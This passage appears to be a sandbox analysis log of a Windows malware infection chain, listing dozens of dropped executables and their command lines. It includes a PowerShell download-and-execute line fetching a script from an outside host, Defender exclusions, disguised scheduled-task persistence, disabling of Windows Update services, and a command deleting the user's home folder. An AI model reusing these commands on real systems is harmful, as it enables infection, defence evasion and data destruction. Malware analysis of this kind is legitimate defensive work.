  "C:\Users\Admin\AppData\Local\Temp\Files\daissss.exe"
  2⤵
  PID:2328
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3196
- C:\Users\Admin\AppData\Local\Temp\Files\micro.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\micro.exe"
  2⤵
  PID:2164
- C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
  2⤵
  PID:4792
- - C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"
    3⤵
    PID:5936
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\fmtODNCxhpe.exe"
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fmtODNCxhpe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp49A3.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5912
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5836
- C:\Users\Admin\AppData\Local\Temp\Files\file.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
  2⤵
  PID:5000
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
    3⤵
    PID:2444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
      4⤵
      PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL
    3⤵
    PID:5188
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5712
- C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"
  2⤵
  PID:5068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 476
    3⤵
    - Program crash
    PID:5500
- C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe"
  2⤵
  PID:5196
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Launches sc.exe
  PID:5288
- C:\Users\Admin\AppData\Local\Temp\Files\html.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
  2⤵
  PID:5376
- - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
    3⤵
    PID:8208
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:7364
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:7500
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:8492
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:5396
- C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
  2⤵
  PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
    3⤵
    PID:10568
- C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"
  2⤵
  PID:8468
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:8632
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  PID:7308
- C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Journal.exe"
  2⤵
  PID:9372
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:9344
- C:\Users\Admin\AppData\Local\Temp\Files\june.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
  2⤵
  PID:9516
- - C:\Users\Admin\AppData\Local\Temp\is-LNCHV.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-LNCHV.tmp\june.tmp" /SL5="$205FA,7382696,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
    3⤵
    PID:8660
- C:\Users\Admin\AppData\Local\Temp\Files\National.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\National.exe"
  2⤵
  PID:9720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    PID:9900
- C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"
  2⤵
  PID:9948
- C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"
  2⤵
  PID:10216
- C:\Users\Admin\AppData\Local\Temp\Files\reo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\reo.exe"
  2⤵
  PID:8960
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:9232
- C:\Users\Admin\AppData\Local\Temp\Files\l.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\l.exe"
  2⤵
  PID:9252
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe" hvasjw34favaawhnb68
    3⤵
    PID:9300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:9252
- C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
  2⤵
  PID:9400
- - C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
    3⤵
    PID:10408
- C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe"
  2⤵
  PID:9584
- C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe"
  2⤵
  PID:9968
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  PID:10076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:9264
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      PID:10500
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:11080
- C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"
  2⤵
  PID:9580
- C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"
  2⤵
  PID:8464
- C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
  2⤵
  PID:9040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
    3⤵
    PID:9740
- C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe"
  2⤵
  PID:10172
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:9712
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:9500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8E3F.tmp.bat""
    3⤵
    PID:3296
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:9668
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:10480
- C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
  2⤵
  PID:9328
- - C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
    3⤵
    PID:10720
- C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
  2⤵
  PID:9236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:11616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:11604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:11592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:11588
- C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"
  2⤵
  PID:9392
- C:\Users\Admin\AppData\Local\Temp\Files\safman_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\safman_setup.exe"
  2⤵
  PID:7084
- - C:\Users\Admin\AppData\Local\Temp\is-B7R8D.tmp\safman_setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-B7R8D.tmp\safman_setup.tmp" /SL5="$D061E,7621741,67584,C:\Users\Admin\AppData\Local\Temp\Files\safman_setup.exe"
    3⤵
    PID:10916
- C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe"
  2⤵
  PID:10340
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:11952
- C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe"
  2⤵
  PID:11280
- C:\Users\Admin\AppData\Local\Temp\Files\32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
  2⤵
  PID:11496
- C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe"
  2⤵
  PID:11836
- C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"
  2⤵
  PID:12144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-Item $HOME -Recurse
    3⤵
    PID:10888
- C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"
  2⤵
  PID:9904
- C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
  2⤵
  PID:6776
- C:\Users\Admin\AppData\Local\Temp\Files\first.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
  2⤵
  PID:10640
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
  2⤵
  PID:9976
- C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\_VTI_CNF.exe"
  2⤵
  PID:11176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
    3⤵
    PID:13060
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"
  2⤵
  PID:7104
- - C:\Users\Admin\AppData\Local\Temp\nsu62E2.tmp
    C:\Users\Admin\AppData\Local\Temp\nsu62E2.tmp
    3⤵
    PID:7620
- C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe"
  2⤵
  PID:11588
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
  2⤵
  PID:12240
- C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
  2⤵
  PID:11476
- C:\Users\Admin\AppData\Local\Temp\Files\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"
  2⤵
  PID:11432

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3b0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:3168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtime-bindr" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\runtime-bind.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtime-bind" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\runtime-bind.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtime-bindr" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\runtime-bind.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Oracle\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Oracle\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Oracle\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Windows\PLA\Templates\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\Templates\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\appcompat\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\appcompat\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Windows\appcompat\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\odt\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\odt\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\odt\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:2476

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:4060
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:4632
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:2072
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4996
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4928

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:4164
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4340
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1388
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4964
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:4296
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:4128
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:2864
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:2456
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:4416
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:4376
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:3352
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  2⤵
  PID:360

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:2932
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:3588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:668

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:4528
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:196
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4340
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1616
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:3988
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:2168
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:408
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:2928
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:4660
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:1800
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2152

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:388
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:1096
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1104
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:3540
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:2404

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pxpxvzslvmqtfph
1⤵
PID:3860

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:1724
- C:\Windows\System32\Wbem\WMIC.exe
  wmic PATH Win32_VideoController GET Name, VideoProcessor
  2⤵
  - Detects videocard installed
  PID:1096

C:\Windows\System32\conhost.exe
